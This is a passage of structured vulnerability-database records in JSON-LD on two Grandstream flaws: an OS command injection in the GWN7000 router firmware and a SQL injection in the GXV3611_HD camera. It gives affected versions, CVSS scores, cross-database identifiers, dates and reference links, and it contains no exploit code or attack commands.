"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202007-1329",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gwn7000",
"scope": "lte",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.9.4"
},
{
"model": "gwn7000",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.9.4"
},
{
"model": "gwn7000",
"scope": "lte",
"trust": 0.6,
"vendor": "grandstream",
"version": "\u003c=1.0.9.4"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-44350"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008264"
},
{
"db": "NVD",
"id": "CVE-2020-5756"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gwn7000_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.0.9.4",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gwn7000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5756"
}
]
},
"cve": "CVE-2020-5756",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2020-008264",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2020-44350",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-008264",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-5756",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-008264",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-44350",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202007-1286",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-44350"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008264"
},
{
"db": "NVD",
"id": "CVE-2020-5756"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1286"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GWN7000 firmware version 1.0.9.4 and below allows authenticated remote users to modify the system\u0027s crontab via undocumented API. An attacker can use this functionality to execute arbitrary OS commands on the router. Grandstream GWN7000 For firmware, OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream GWN7000 is an enterprise-class multi-WAN gigabit VPN router",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5756"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008264"
},
{
"db": "CNVD",
"id": "CNVD-2020-44350"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-5756",
"trust": 3.0
},
{
"db": "TENABLE",
"id": "TRA-2020-41",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008264",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-44350",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "47954",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1286",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-44350"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008264"
},
{
"db": "NVD",
"id": "CVE-2020-5756"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1286"
}
]
},
"id": "VAR-202007-1329",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-44350"
}
],
"trust": 1.2666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-44350"
}
]
},
"last_update_date": "2023-12-18T12:42:50.467000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "GWN7000",
"trust": 0.8,
"url": "http://www.grandstream.com/products/networking-solutions/gigabit-routers/product/gwn7000"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008264"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008264"
},
{
"db": "NVD",
"id": "CVE-2020-5756"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.tenable.com/cve/cve-2020-5756"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5756"
},
{
"trust": 1.6,
"url": "https://www.tenable.com/security/research/tra-2020-41"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5756"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/47954"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-44350"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008264"
},
{
"db": "NVD",
"id": "CVE-2020-5756"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1286"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-44350"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008264"
},
{
"db": "NVD",
"id": "CVE-2020-5756"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1286"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-44350"
},
{
"date": "2020-09-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-008264"
},
{
"date": "2020-07-17T21:15:13.607000",
"db": "NVD",
"id": "CVE-2020-5756"
},
{
"date": "2020-07-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202007-1286"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-44350"
},
{
"date": "2020-09-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-008264"
},
{
"date": "2020-07-22T20:43:00.760000",
"db": "NVD",
"id": "CVE-2020-5756"
},
{
"date": "2020-08-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202007-1286"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202007-1286"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GWN7000 In firmware OS Command injection vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008264"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202007-1286"
}
],
"trust": 0.6
}
}
VAR-201507-0148
Vulnerability from variot - Updated: 2023-12-18 12:37SQL injection vulnerability on the Grandstream GXV3611_HD camera with firmware before 1.0.3.9 beta allows remote attackers to execute arbitrary SQL commands by attempting to establish a TELNET session with a crafted username. Grandstream GXV3611_HD Is a network camera for surveillance. Grandstream GXV3611_HD Is SQL There is an injection vulnerability. An attacker can use this vulnerability to SQL It is possible to perform injection attacks. CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') http://cwe.mitre.org/data/definitions/89.htmlBy a remote third party SQL By injection, the settings of the device may be viewed or changed. Grandstream GXV3611_HD is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Grandstream GXV3611_HD 1.0.3.6 is vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201507-0148",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gxv3611 hd",
"scope": "lte",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.3.6"
},
{
"model": "gxv3611 hd",
"scope": "eq",
"trust": 0.9,
"vendor": "grandstream",
"version": "1.0.3.6"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "grandstream",
"version": null
},
{
"model": "gxv3611 hd",
"scope": null,
"trust": 0.8,
"vendor": "grandstream",
"version": null
},
{
"model": "gxv3611 hd",
"scope": "lte",
"trust": 0.8,
"vendor": "grandstream",
"version": "version 1.0.3.6"
},
{
"model": "gxv3611 hd beta",
"scope": "lt",
"trust": 0.6,
"vendor": "grandstream",
"version": "1.0.3.9"
},
{
"model": "gxv3611 hd beta",
"scope": "ne",
"trust": 0.3,
"vendor": "grandstream",
"version": "1.0.3.9"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#253708"
},
{
"db": "CNVD",
"id": "CNVD-2015-04400"
},
{
"db": "BID",
"id": "75580"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003477"
},
{
"db": "NVD",
"id": "CVE-2015-2866"
},
{
"db": "CNNVD",
"id": "CNNVD-201507-191"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxv3611_hd_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.0.3.6",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxv3611_hd:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-2866"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Living Lab at IUPUI",
"sources": [
{
"db": "BID",
"id": "75580"
}
],
"trust": 0.3
},
"cve": "CVE-2015-2866",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 6.4,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "PARTIAL",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 3.8,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 10.0,
"id": "CVE-2015-2866",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "OFFICIAL FIX",
"reportConfidence": "CONFIRMED",
"severity": "MEDIUM",
"targetDistribution": "MEDIUM",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2015-2866",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-04400",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-80827",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-2866",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2015-2866",
"trust": 0.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2015-04400",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201507-191",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-80827",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#253708"
},
{
"db": "CNVD",
"id": "CNVD-2015-04400"
},
{
"db": "VULHUB",
"id": "VHN-80827"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003477"
},
{
"db": "NVD",
"id": "CVE-2015-2866"
},
{
"db": "CNNVD",
"id": "CNNVD-201507-191"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection vulnerability on the Grandstream GXV3611_HD camera with firmware before 1.0.3.9 beta allows remote attackers to execute arbitrary SQL commands by attempting to establish a TELNET session with a crafted username. Grandstream GXV3611_HD Is a network camera for surveillance. Grandstream GXV3611_HD Is SQL There is an injection vulnerability. An attacker can use this vulnerability to SQL It is possible to perform injection attacks. CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027) http://cwe.mitre.org/data/definitions/89.htmlBy a remote third party SQL By injection, the settings of the device may be viewed or changed. Grandstream GXV3611_HD is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. \nAn attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. \nGrandstream GXV3611_HD 1.0.3.6 is vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-2866"
},
{
"db": "CERT/CC",
"id": "VU#253708"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003477"
},
{
"db": "CNVD",
"id": "CNVD-2015-04400"
},
{
"db": "BID",
"id": "75580"
},
{
"db": "VULHUB",
"id": "VHN-80827"
}
],
"trust": 3.24
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-80827",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-80827"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-2866",
"trust": 4.2
},
{
"db": "CERT/CC",
"id": "VU#253708",
"trust": 4.2
},
{
"db": "EXPLOIT-DB",
"id": "40441",
"trust": 1.1
},
{
"db": "JVN",
"id": "JVNVU97426101",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003477",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201507-191",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2015-04400",
"trust": 0.6
},
{
"db": "BID",
"id": "75580",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-80827",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#253708"
},
{
"db": "CNVD",
"id": "CNVD-2015-04400"
},
{
"db": "VULHUB",
"id": "VHN-80827"
},
{
"db": "BID",
"id": "75580"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003477"
},
{
"db": "NVD",
"id": "CVE-2015-2866"
},
{
"db": "CNNVD",
"id": "CNNVD-201507-191"
}
]
},
"id": "VAR-201507-0148",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-04400"
},
{
"db": "VULHUB",
"id": "VHN-80827"
}
],
"trust": 1.075
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-04400"
}
]
},
"last_update_date": "2023-12-18T12:37:58.335000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for the Grandstream GXV3611_HD Camera SQL Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/60767"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-04400"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-80827"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003477"
},
{
"db": "NVD",
"id": "CVE-2015-2866"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.4,
"url": "http://www.kb.cert.org/vuls/id/253708"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/40441/"
},
{
"trust": 0.8,
"url": "about vulnerability notes"
},
{
"trust": 0.8,
"url": "contact us about this vulnerability"
},
{
"trust": 0.8,
"url": "provide a vendor statement"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2866"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu97426101"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2866"
},
{
"trust": 0.3,
"url": "http://www.grandstream.com/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#253708"
},
{
"db": "CNVD",
"id": "CNVD-2015-04400"
},
{
"db": "VULHUB",
"id": "VHN-80827"
},
{
"db": "BID",
"id": "75580"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003477"
},
{
"db": "NVD",
"id": "CVE-2015-2866"
},
{
"db": "CNNVD",
"id": "CNNVD-201507-191"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#253708"
},
{
"db": "CNVD",
"id": "CNVD-2015-04400"
},
{
"db": "VULHUB",
"id": "VHN-80827"
},
{
"db": "BID",
"id": "75580"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-003477"
},
{
"db": "NVD",
"id": "CVE-2015-2866"
},
{
"db": "CNNVD",
"id": "CNNVD-201507-191"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-07-07T00:00:00",
"db": "CERT/CC",
"id": "VU#253708"
},
{
